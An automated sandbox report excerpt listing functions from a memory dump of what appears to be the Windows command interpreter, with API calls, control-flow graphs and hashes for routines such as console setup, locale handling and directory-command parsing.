                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                            • String ID:
                                                                            • API String ID: 796493780-0
                                                                            • Opcode ID: 3d771c3d5d3b3a30f10b3fd0e61b85a49303dc15257259b11007c45dff53fadf
                                                                            • Instruction ID: db97027c54607d87838a133f7ff74a205a63ac2d7cac37638b56d858e8f5395f
                                                                            • Opcode Fuzzy Hash: 3d771c3d5d3b3a30f10b3fd0e61b85a49303dc15257259b11007c45dff53fadf
                                                                            • Instruction Fuzzy Hash: CB31E176544211CFEB359F56EC456A93BE0EB48765FA000A9E515A72E0EF70D881CB41
                                                                            Function 00B0E2AF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34threadlibraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 682 b0e2af-b0e2ba 683 b0e2ca-b0e2d2 682->683 684 b0e2bc-b0e2c9 SetThreadUILanguage 682->684 685 b0e2d4-b0e2ed GetModuleHandleW 683->685 686 b0e2ef-b0e2f1 683->686 685->686 688 b0e307-b0e309 685->688 686->688 689 b0e2f3-b0e301 GetProcAddress 686->689 688->684 690 b0e30b-b1dc0f SetThreadLocale 688->690 689->688
                                                                            APIs
                                                                            • SetThreadUILanguage.KERNELBASE ref: 00B0E2C6
                                                                            • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00B0B952), ref: 00B0E2D9
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(74DD0000,SetThreadUILanguage,00000000,00B0B952), ref: 00B0E2F9
                                                                            • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00B0B952), ref: 00B1DC08
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                            • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                            • API String ID: 1264603166-2530943252
                                                                            • Opcode ID: be28ef8e9dbd4624b1c984de38b608a1d95aee5c0e1b135a79d3674be0bcb916
                                                                            • Instruction ID: 590435d24ece86b04382eee02421fcd5201071306ab8cc62bdb0c09dcded826a
                                                                            • Opcode Fuzzy Hash: be28ef8e9dbd4624b1c984de38b608a1d95aee5c0e1b135a79d3674be0bcb916
                                                                            • Instruction Fuzzy Hash: F3F03A35A402209BCA215B24BD4D65A3F94FB06B71B250B86FD25E32E0CB70EC468AE5
                                                                            Function 00B0AD60 Relevance: 9.3, APIs: 6, Instructions: 328COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 692 b0ad60-b0adc0 GetConsoleTitleW 693 b1cc60 692->693 694 b0adc6-b0add8 call b15a2e 692->694 696 b1cc6a-b1cc73 GetLastError 693->696 698 b1cc3f 694->698 699 b0adde-b0adf1 call b0e3f0 694->699 700 b1cc4d call b078e4 696->700 704 b1cc49-b1cc4b 698->704 706 b1cc55-b1cc5b call b161e6 699->706 707 b0adf7-b0adff 699->707 705 b1cc52 700->705 704->700 705->706 706->693 708 b0ae05-b0ae1d call b0e950 707->708 709 b0b0b9-b0b0c3 call b10b12 707->709 715 b0ae23-b0ae26 708->715 716 b0b118-b0b11f call b121ee 708->716 709->704 717 b0b0c9-b0b0d6 call b07f47 709->717 715->706 718 b0ae2c-b0ae3e 715->718 730 b0b126-b0b12b call b12940 716->730 717->696 728 b0b0dc-b0b0f9 towupper 717->728 721 b0ae44-b0ae4c 718->721 722 b1cc7c-b1cc87 call b161e6 718->722 726 b0ae52-b0ae62 721->726 727 b1cc8e 721->727 722->727 731 b1cc99 726->731 732 b0ae68-b0ae76 726->732 727->731 733 b0b100-b0b109 728->733 741 b0afc9-b0b005 call b0b17b call b161e6 call b16b30 730->741 735 b1cca4 731->735 732->735 736 b0ae7c-b0ae8b call b0bc30 732->736 733->733 737 b0b10b-b0b112 733->737 742 b1ccaf 735->742 746 b0ae91-b0ae94 736->746 747 b0b006-b0b008 736->747 737->716 740 b1cc75-b1cc77 call b29a7d 737->740 740->722 751 b1ccb7-b1ccb9 742->751 748 b0ae96-b0aea3 call b0a800 746->748 749 b0aea9-b0aeab 746->749 747->746 752 b0b00e-b0b021 wcsncmp 747->752 748->706 748->749 754 b0af71-b0af7a call b0b1b0 749->754 755 b0aeb1-b0aeb5 749->755 757 b0af2d-b0af36 751->757 758 b1ccbf-b1ccc4 751->758 752->749 759 b0b027 752->759 776 b0af83-b0af97 754->776 777 b0af7c-b0af7e call b0ad26 754->777 763 b0af6b 755->763 764 b0aebb-b0aebd 755->764 760 b0b130-b0b135 757->760 761 b0af3c-b0af3e 757->761 758->757 759->746 760->761 769 b0b13b-b0b145 call b10b12 760->769 767 b0af44-b0af49 761->767 768 b0b16c-b0b170 761->768 763->754 770 b0aec0-b0aec9 764->770 773 b0af50-b0af59 767->773 768->767 779 b0b176-b1ccd6 768->779 790 b0b147-b0b14e 769->790 791 b0b198-b0b19c 769->791 770->770 775 b0aecb-b0aedd wcschr 770->775 773->773 780 b0af5b-b0af65 773->780 782 b0b033-b0b043 775->782 783 b0aee3-b0aee8 775->783 785 b0afc4 call b0aa50 776->785 786 b0af99-b0af9f 776->786 777->776 795 b1ccdb-b1ccea call b078e4 779->795 780->755 780->763 788 b0b046-b0b04f 782->788 783->751 792 b0aeee-b0aef4 783->792 785->741 793 b0afa5-b0afab 786->793 794 b0b02c-b0b031 call b0c6c0 786->794 788->788 797 b0b051-b0b05b 788->797 798 b0b160-b0b167 790->798 799 b0b150-b0b15a call b07f47 790->799 791->795 792->751 800 b0aefa-b0af03 792->800 801 b0afb1-b0afb7 793->801 802 b0b098-b0b09d call b09dc0 793->802 794->741 795->705 806 b0b077-b0b07f 797->806 807 b0b05d 797->807 798->761 799->798 826 b1ccc9-b1ccd2 GetLastError 799->826 809 b0af05-b0af0a 800->809 811 b0b0a2-b0b0a8 801->811 812 b0afbd-b0afc2 call b09770 801->812 802->741 815 b0b193 call b16c78 806->815 816 b0b085-b0b08e 806->816 814 b0b060-b0b067 807->814 818 b0af20-b0af22 809->818 819 b0af0c-b0af13 809->819 811->730 821 b0b0aa-b0b0b2 call b059a0 811->821 812->741 824 b0b072-b0b075 814->824 825 b0b069-b0b071 814->825 815->791 816->802 818->742 828 b0af28-b0af2a 818->828 819->818 827 b0af15-b0af1e 819->827 830 b0b0b4 821->830 824->806 824->814 825->824 826->795 827->809 827->818 828->757 830->741
                                                                            APIs
                                                                            • GetConsoleTitleW.KERNELBASE(?,00000104,F330BDDA,00000001,?), ref: 00B0ADB6
                                                                              • Part of subcall function 00B15A2E: memset.MSVCRT ref: 00B15A5A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • towupper.MSVCRT ref: 00B0B0E3
                                                                              • Part of subcall function 00B0E950: memset.MSVCRT ref: 00B0E9A0
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0E9FC
                                                                              • Part of subcall function 00B0E950: wcschr.MSVCRT ref: 00B0EA14
                                                                              • Part of subcall function 00B0E950: _wcsicmp.MSVCRT ref: 00B0EA80
                                                                            • wcschr.MSVCRT ref: 00B0AED2
                                                                            • wcsncmp.MSVCRT ref: 00B0B016
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00B1CC6C
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B1CCCB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                            • String ID:
                                                                            • API String ID: 4198873954-0
                                                                            • Opcode ID: 092302c6b122b34e9e39db7c6503134fe4b5ba9e80691f5a221f5ef8d3490531
                                                                            • Instruction ID: 496de814930d71132970f3def9a9953790c24e0b392b3e9111d72e93ff8e7396
                                                                            • Opcode Fuzzy Hash: 092302c6b122b34e9e39db7c6503134fe4b5ba9e80691f5a221f5ef8d3490531
                                                                            • Instruction Fuzzy Hash: 56B12971A003128BCB24AB28CC95BBA7BE0EF40700F5449E9D90AE72D1EF709D85C7D6
                                                                            Function 00B11F1A Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 861 b11f1a-b11f33 GetConsoleOutputCP GetCPInfo 862 b1f185-b1f194 GetThreadLocale 861->862 863 b11f39-b11f54 memset 861->863 866 b1f196-b1f1a0 862->866 867 b1f1ae-b1f1b2 862->867 864 b1f1d7-b1f1d8 863->864 865 b11f5a 863->865 868 b1f1dd-b1f1e2 864->868 866->867 869 b1f1b4-b1f1b8 867->869 870 b1f1c8 867->870 871 b1f1e4-b1f1ec 868->871 872 b1f20b-b1f20c 868->872 869->870 873 b1f1ba 869->873 870->864 874 b1f203-b1f209 871->874 875 b1f1ee-b1f200 memset 871->875 873->870 874->868 874->872 875->874
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNELBASE(00B10A41), ref: 00B11F1A
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B11F2B
                                                                            • memset.MSVCRT ref: 00B11F45
                                                                            • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00B1F185
                                                                            • memset.MSVCRT ref: 00B1F1FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                            • String ID:
                                                                            • API String ID: 1263632223-0
                                                                            • Opcode ID: 3e82084c6c9b5f9336f9582504a3a66986919f668ad86a73911ee26795499a01
                                                                            • Instruction ID: 5c7f419e3cf63b42d08ad01bb742537b353c0742c67990ab0d82bf2b473fd2a9
                                                                            • Opcode Fuzzy Hash: 3e82084c6c9b5f9336f9582504a3a66986919f668ad86a73911ee26795499a01
                                                                            • Instruction Fuzzy Hash: D31129B5858343A9D7225F94DC4A7F93BE4E701301FD502F6E98177194EBA445C2C356
                                                                            Function 00B0E3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 883 b0e3f0-b0e403 884 b0e405-b0e41d call b16e25 883->884 885 b0e45d 883->885 888 b0e422-b0e427 884->888 886 b0e45f-b0e463 885->886 889 b1dc4a-b1dc66 call b234d4 888->889 890 b0e42d-b0e43b 888->890 889->886 891 b0e441-b0e44f 890->891 892 b1dc6b-b1dc72 ??_V@YAXPAX@Z 890->892 894 b0e451-b0e45a memset 891->894 895 b0e466-b0e468 891->895 894->885 895->894
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00B05F21,-00000001), ref: 00B1DC6C
                                                                            Strings
                                                                            • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00B1DC57
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                            • API String ID: 2221118986-3416068913
                                                                            • Opcode ID: 02dcc5dfa77ef786a2e423f5ca04801161f0142e842871a747b5b96ddc1a2d3f
                                                                            • Instruction ID: 746b630debb8955a33db3989337e89a10121edd0a4dd8500793b23e1ba5c3b6c
                                                                            • Opcode Fuzzy Hash: 02dcc5dfa77ef786a2e423f5ca04801161f0142e842871a747b5b96ddc1a2d3f
                                                                            • Instruction Fuzzy Hash: CE014CB2740304ABD7285724DC4AB6FBBD9DBD0310F1049ADF82AD73D1DEA5EC8082A1
                                                                            Function 00B1742D Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _callnewh.MSVCRT ref: 00B17437
                                                                              • Part of subcall function 00B174D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(00B177EC,00000001), ref: 00B174E7
                                                                            • malloc.MSVCRT ref: 00B17444
                                                                            • _CxxThrowException.MSVCRT(?,00B2CBF8), ref: 00B177F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                            • String ID:
                                                                            • API String ID: 813871643-0
                                                                            • Opcode ID: ecd134d0703e911ac0725b13b26ecaff0a7d9ebb41946ba102098d14fc723a3b
                                                                            • Instruction ID: a775f62a7d018eaac71eee10d52f38081ab08da51aa02eb730bce90ac627611a
                                                                            • Opcode Fuzzy Hash: ecd134d0703e911ac0725b13b26ecaff0a7d9ebb41946ba102098d14fc723a3b
                                                                            • Instruction Fuzzy Hash: 5AE0923948811D678F106665EC59CDD3FFC9B41320BA440E0B81997691DF20DA81C1D1
                                                                            Function 00B05EA3 Relevance: 3.3, APIs: 2, Instructions: 292COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B05EFB
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                              • Part of subcall function 00B10060: wcschr.MSVCRT ref: 00B1006C
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B05FF7
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                            • String ID:
                                                                            • API String ID: 4234405029-0
                                                                            • Opcode ID: bc7596e2dbf266fafa588001e9af3b79118516b2b958012aade6a9eb5409fbf6
                                                                            • Instruction ID: a53148ddf52b839421921c07a8088c15c55ea12978a22bd24a57ceae937ea01c
                                                                            • Opcode Fuzzy Hash: bc7596e2dbf266fafa588001e9af3b79118516b2b958012aade6a9eb5409fbf6
                                                                            • Instruction Fuzzy Hash: 47A1B0716083819BD724DB20C8596BFBBE5EF84340F5488ADF88AC7290EF74D985CB52
                                                                            Function 00B0E470 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: COMSPEC
                                                                            • API String ID: 2221118986-1631433037
                                                                            • Opcode ID: c482470fd2a0810456fe953e43e2af5dbe27c68c2f285d30a71230d83516d99a
                                                                            • Instruction ID: cfdb2dc1dc151a8353ced439f053cd31594c916f77c41f407ef9d1745dcd89ae
                                                                            • Opcode Fuzzy Hash: c482470fd2a0810456fe953e43e2af5dbe27c68c2f285d30a71230d83516d99a
                                                                            • Instruction Fuzzy Hash: 1741F3717046008BDB34AB28999572E7EC5DBA0708F140DEAF972872D1FE61EC848293
                                                                            Function 00B16E30 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_catch.LIBCMT ref: 00B16E37
                                                                              • Part of subcall function 00B1742D: malloc.MSVCRT ref: 00B17444
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3_catchmalloc
                                                                            • String ID:
                                                                            • API String ID: 125873668-0
                                                                            • Opcode ID: 48d7fb9f5d636b4b1754492dafadabc294da77beafda9db2091cb403d3e8b5e6
                                                                            • Instruction ID: 42f3ee6da877fa7a825783faeb6844bd1faf7dc3d8f868623e2835437367ba1c
                                                                            • Opcode Fuzzy Hash: 48d7fb9f5d636b4b1754492dafadabc294da77beafda9db2091cb403d3e8b5e6
                                                                            • Instruction Fuzzy Hash: BFC08C2A1A8104D6CB013790E002BDC2AF0BB02B02FD080C4B0801F085DE7046D52A91
                                                                            Function 00B11A05 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: dd042cd82db2749d773011737cfdba250cd93b47defd5e9e625dbbce476ced81
                                                                            • Instruction ID: 7c1f5b426dd88b73e6052a2c6584f1316078c294fe19d094b37ee02bc597e096
                                                                            • Opcode Fuzzy Hash: dd042cd82db2749d773011737cfdba250cd93b47defd5e9e625dbbce476ced81
                                                                            • Instruction Fuzzy Hash: CEE0267774A2212BE22C15A86C8BF978FDDCBC0B70F2D01BAF6049B1C0E9904D0402A4

                                                                            Non-executed Functions

                                                                            Function 00B24191 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 00B241B9
                                                                            • _get_osfhandle.MSVCRT ref: 00B241CA
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00B24205
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B2426C
                                                                            • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00B29E02,?,00000010), ref: 00B24283
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B24292
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B242B1
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B242C4
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B242D2
                                                                            • RtlFreeHeap.NTDLL ref: 00B242D9
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B2432F
                                                                            • RtlFreeHeap.NTDLL ref: 00B24336
                                                                            • _wcsnicmp.MSVCRT ref: 00B243DB
                                                                            • _wcsnicmp.MSVCRT ref: 00B243F0
                                                                            • _wcsnicmp.MSVCRT ref: 00B24405
                                                                            • _wcsnicmp.MSVCRT ref: 00B2441A
                                                                            • _wcsnicmp.MSVCRT ref: 00B2442F
                                                                            • _wcsnicmp.MSVCRT ref: 00B24444
                                                                            • _wcsnicmp.MSVCRT ref: 00B24459
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 00B244A5
                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00B244F0
                                                                            • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00B24506
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 00B2451D
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00B24565
                                                                            • RtlFreeHeap.NTDLL ref: 00B2456C
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00B24595
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B2459C
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B245C3
                                                                            • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00B29E02,?,00000000), ref: 00B245D4
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B245DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                            • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                            • API String ID: 2991647268-3100821235
                                                                            • Opcode ID: dd56136d517be993f58909426e3007775f461912bd5b3d34db28623b25a8c45b
                                                                            • Instruction ID: 2b3f2bfd9814bfc9f8a5870eb358e0eeb8c5a1c08cd5c5022393d209e4f93173
                                                                            • Opcode Fuzzy Hash: dd56136d517be993f58909426e3007775f461912bd5b3d34db28623b25a8c45b
                                                                            • Instruction Fuzzy Hash: F4C1DD35604311AFD720AF64EC89A2FBBE5FB89714F04496CF95AC36A0DB71CA45CB12
                                                                            Function 00B04C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
